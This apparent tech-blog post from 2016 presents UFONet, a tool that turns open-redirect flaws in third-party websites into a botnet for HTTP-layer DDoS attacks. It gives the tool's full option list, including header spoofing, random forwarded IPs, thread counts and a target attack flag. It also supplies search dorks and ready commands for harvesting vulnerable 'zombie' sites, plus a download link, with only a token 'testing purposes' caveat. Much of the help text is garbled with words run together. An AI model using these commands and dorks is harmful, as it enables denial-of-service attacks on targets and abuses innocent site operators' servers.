UFONet – Open Redirect DDoS Tool

Datetime:2016-08-22 21:39:33          Topic: DDOS           Share

UFONet is an open redirect DDoS tool designed to launch attacks against a target, using insecure redirects in third party web applications, like a botnet. Obviously, only for testing purposes.

The tool abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.

Definition of an “Open Redirect”:

An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.

From: CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)

Usage

Options:
  --version            showprogram's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                runGUI (UFONetWebInterface)
 
  *ConfigureRequest(s)*:
    --proxy=PROXY      Use proxyserver (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use anotherHTTPUser-Agentheader (default SPOOFED)
    --referer=REFERER  Use anotherHTTPRefererheader (default SPOOFED)
    --host=HOST        Use anotherHTTPHostheader (default NONE)
    --xforw            SetyourHTTP X-Forwarded-For withrandomIPvalues
    --xclient          SetyourHTTP X-Client-IPwithrandomIPvalues
    --timeout=TIMEOUT  Selectyourtimeout (default 10)
    --retries=RETRIES  Retrieswhentheconnectiontimeouts (default 1)
    --threads=THREADS  MaximumnumberofconcurrentHTTPrequests (default 5)
    --delay=DELAY      Delayin secondsbetweeneach HTTPrequest (default 0)
 
  *Searchfor 'Zombies'*:
    -s SEARCH          Searchfrom a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Searchfrom a listof 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Setmaxnumberofresultsfor engine (default 10)
    --se=ENGINE        Searchengineto use for 'dorking' (default: duck)
    --sa                Searchmassivelyusingallsearchengines
 
  *TestBotnet*:
    -t TEST            Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me        Order 'zombies' to attackyou (NATrequired!)
 
  *Community*:
    --download-zombies  Download 'zombies' fromCommunityserver: Turina
    --upload-zombies    Uploadyour 'zombies' to Communityserver: Turina
    --blackhole        Create a 'blackhole' to shareyour 'zombies'
    --up-to=UPIP        Uploadyour 'zombies' to a 'blackhole'
    --down-from=DIP    Downloadyour 'zombies' from a 'blackhole'
 
  *ResearchTarget*:
    -i INSPECT          Searchfor biggestfile (ex: -i 'http://target.com')
 
  *ConfigureAttack(s)*:
    --disable-aliens    Disable 'aliens' webabuseoftestservices
    --disable-isup      Disablecheckstatus 'is target up?'
    -r ROUNDS          Setnumberofrounds (default: 1)
    -b PLACE            Setplaceto attack (ex: -b '/path/big.jpg')
    -a TARGET          StartWebDDoSattack (ex: -a 'http(s)://target.com')

Searching for ‘Zombies’

UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:

        'proxy.php?url='
        'check.cgi?url='
        'checklink?uri='
        'validator?uri='

For example you can begin a search with:

      ./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

      ./ufonet --sd 'dorks.txt'

By default UFONet will uses a search engine called ‘duck’. But you can choose a different one:

      ./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines with last time that were working:

        - duck [07/10/2015: OK!]
        - google [07/10/2015: OK!]
        - bing [07/10/2015: OK!]
        - yahoo [07/10/2015: OK!]
        - yandex [07/10/2015: OK!]

You can also search massively using all search engines supported:

      ./ufonet -s 'proxy.php?url=' --sa 

To control how many ‘zombies’ recieve from search engines you can use:

      ./ufonet --sd 'dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.

      Wannacheckif theyarevalidzombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

      Wannaupdateyourlist (Y/n)

If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

    + withverbose:    ./ufonet -s 'proxy.php?url=' -v
    + withthreads:    ./ufonet --sd 'dorks.txt' --sa --threads 100

You can download UFOnet here:

gitclone https://github.com/epsylon/ufonet

Or read more here .





About List